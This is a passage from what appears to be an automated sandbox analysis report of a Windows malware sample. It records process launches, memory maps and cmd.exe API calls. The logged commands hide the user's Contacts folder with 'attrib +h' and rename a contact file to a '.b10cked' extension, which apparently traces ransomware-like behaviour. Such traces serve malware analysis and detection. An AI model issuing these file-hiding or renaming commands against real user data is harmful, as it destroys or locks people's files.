"0x60800000" monitor_reason = "child_process" parent_id = "561" os_parent_pid = "0xe3c" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32646 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32647 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000030000" filename = "" Region: id = 32648 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32649 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 32650 start_va = 0x440000 end_va = 0x446fff entry_point = 0x440000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32651 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32652 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32653 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32654 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32655 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32656 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32657 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32658 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 32659 start_va = 0x100000 end_va = 
0x1fffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 32660 start_va = 0x200000 end_va = 0x266fff entry_point = 0x200000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32661 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32662 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32663 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32664 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32665 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32666 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32667 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32668 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 
0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32669 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32670 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32671 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32672 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32673 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 32674 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32675 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 767 os_tid = 0xca0 Process: id = "564" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16cc0" os_pid = "0xfd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "561" os_parent_pid = "0xe3c" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" 
os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32676 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32677 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32678 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32679 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 32680 start_va = 0x6c0000 end_va = 0x6c6fff entry_point = 0x6c0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32681 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32682 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32683 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32684 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffd3000" filename = "" Region: id = 32685 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32686 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32687 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32688 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32689 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 32690 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 32691 start_va = 0x71e50000 end_va = 0x71e6cfff entry_point = 0x71e50000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32692 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32693 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32694 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32695 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 
0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32696 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32697 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32698 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32699 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32700 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32701 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32702 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32703 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 32704 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = 
"\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32705 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 768 os_tid = 0xe70 Process: id = "565" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16600" os_pid = "0x698" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32718 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32719 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32720 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32721 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 32722 start_va = 0x49fe0000 end_va = 0x4a02bfff entry_point = 0x49fe0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" 
(normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32723 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32724 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32725 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32726 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 32727 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32728 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32729 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32730 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32731 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 32732 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 32733 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: 
"c:\\windows\\system32\\winbrand.dll") Region: id = 32734 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32735 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32736 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32737 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32738 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32739 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32740 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32741 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32742 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 32743 start_va = 0x76490000 end_va = 
0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32744 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32745 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32746 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 32747 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 32748 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 32749 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 32750 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 32751 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Thread: id = 769 os_tid = 0x514 [0218.563] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fc4c | out: lpSystemTimeAsFileTime=0x24fc4c*(dwLowDateTime=0xb7123f00, dwHighDateTime=0x1d440a9)) [0218.563] GetCurrentProcessId () returned 0x698 [0218.563] GetCurrentThreadId () returned 0x514 [0218.563] GetTickCount () returned 0x3d104 [0218.563] QueryPerformanceCounter (in: lpPerformanceCount=0x24fc44 | out: lpPerformanceCount=0x24fc44*=27535222876) returned 1 [0218.564] GetModuleHandleA (lpModuleName=0x0) returned 0x49fe0000 
[0218.564] __set_app_type (_Type=0x1) [0218.564] __p__fmode () returned 0x76b331f4 [0218.564] __p__commode () returned 0x76b331fc [0218.564] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a0021a6) returned 0x0 [0218.564] __getmainargs (in: _Argc=0x4a004238, _Argv=0x4a004240, _Env=0x4a00423c, _DoWildCard=0, _StartInfo=0x4a004140 | out: _Argc=0x4a004238, _Argv=0x4a004240, _Env=0x4a00423c) returned 0 [0218.564] GetCurrentThreadId () returned 0x514 [0218.564] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x514) returned 0x38 [0218.564] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0218.564] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0218.564] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.565] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0218.565] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fbdc | out: phkResult=0x24fbdc*=0x0) returned 0x2 [0218.565] VirtualQuery (in: lpAddress=0x24fc13, lpBuffer=0x24fbac, dwLength=0x1c | out: lpBuffer=0x24fbac*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0218.565] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fbac, dwLength=0x1c | out: lpBuffer=0x24fbac*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0218.565] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fbac, dwLength=0x1c | out: lpBuffer=0x24fbac*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0218.565] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fbac, dwLength=0x1c | out: 
lpBuffer=0x24fbac*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0218.565] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fbac, dwLength=0x1c | out: lpBuffer=0x24fbac*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0218.565] GetConsoleOutputCP () returned 0x1b5 [0218.565] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a004260 | out: lpCPInfo=0x4a004260) returned 1 [0218.565] SetConsoleCtrlHandler (HandlerRoutine=0x49ffe72a, Add=1) returned 1 [0218.565] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.565] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0218.565] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.565] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0041ac | out: lpMode=0x4a0041ac) returned 1 [0218.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.566] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.566] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.566] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0041b0 | out: lpMode=0x4a0041b0) returned 1 [0218.566] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.566] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0218.566] GetEnvironmentStringsW () returned 0x2f0180* [0218.566] FreeEnvironmentStringsW (penv=0x2f0180) returned 1 [0218.567] GetEnvironmentStringsW () returned 0x2f0180* [0218.567] FreeEnvironmentStringsW (penv=0x2f0180) returned 1 [0218.567] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eb4c | out: phkResult=0x24eb4c*=0x40) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x0, lpData=0x24eb58*=0xa8, 
lpcbData=0x24eb50*=0x1000) returned 0x2 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x4, lpData=0x24eb58*=0x1, lpcbData=0x24eb50*=0x4) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x0, lpData=0x24eb58*=0x1, lpcbData=0x24eb50*=0x1000) returned 0x2 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x4, lpData=0x24eb58*=0x0, lpcbData=0x24eb50*=0x4) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x4, lpData=0x24eb58*=0x40, lpcbData=0x24eb50*=0x4) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x4, lpData=0x24eb58*=0x40, lpcbData=0x24eb50*=0x4) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x0, lpData=0x24eb58*=0x40, lpcbData=0x24eb50*=0x1000) returned 0x2 [0218.567] RegCloseKey (hKey=0x40) returned 0x0 [0218.567] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eb4c | out: phkResult=0x24eb4c*=0x40) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x0, lpData=0x24eb58*=0x40, lpcbData=0x24eb50*=0x1000) returned 0x2 [0218.567] RegQueryValueExW (in: 
hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x4, lpData=0x24eb58*=0x1, lpcbData=0x24eb50*=0x4) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x0, lpData=0x24eb58*=0x1, lpcbData=0x24eb50*=0x1000) returned 0x2 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x4, lpData=0x24eb58*=0x0, lpcbData=0x24eb50*=0x4) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x4, lpData=0x24eb58*=0x9, lpcbData=0x24eb50*=0x4) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x4, lpData=0x24eb58*=0x9, lpcbData=0x24eb50*=0x4) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x0, lpData=0x24eb58*=0x9, lpcbData=0x24eb50*=0x1000) returned 0x2 [0218.567] RegCloseKey (hKey=0x40) returned 0x0 [0218.567] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b4 [0218.567] srand (_Seed=0x5b8863b4) [0218.567] GetCommandLineW () 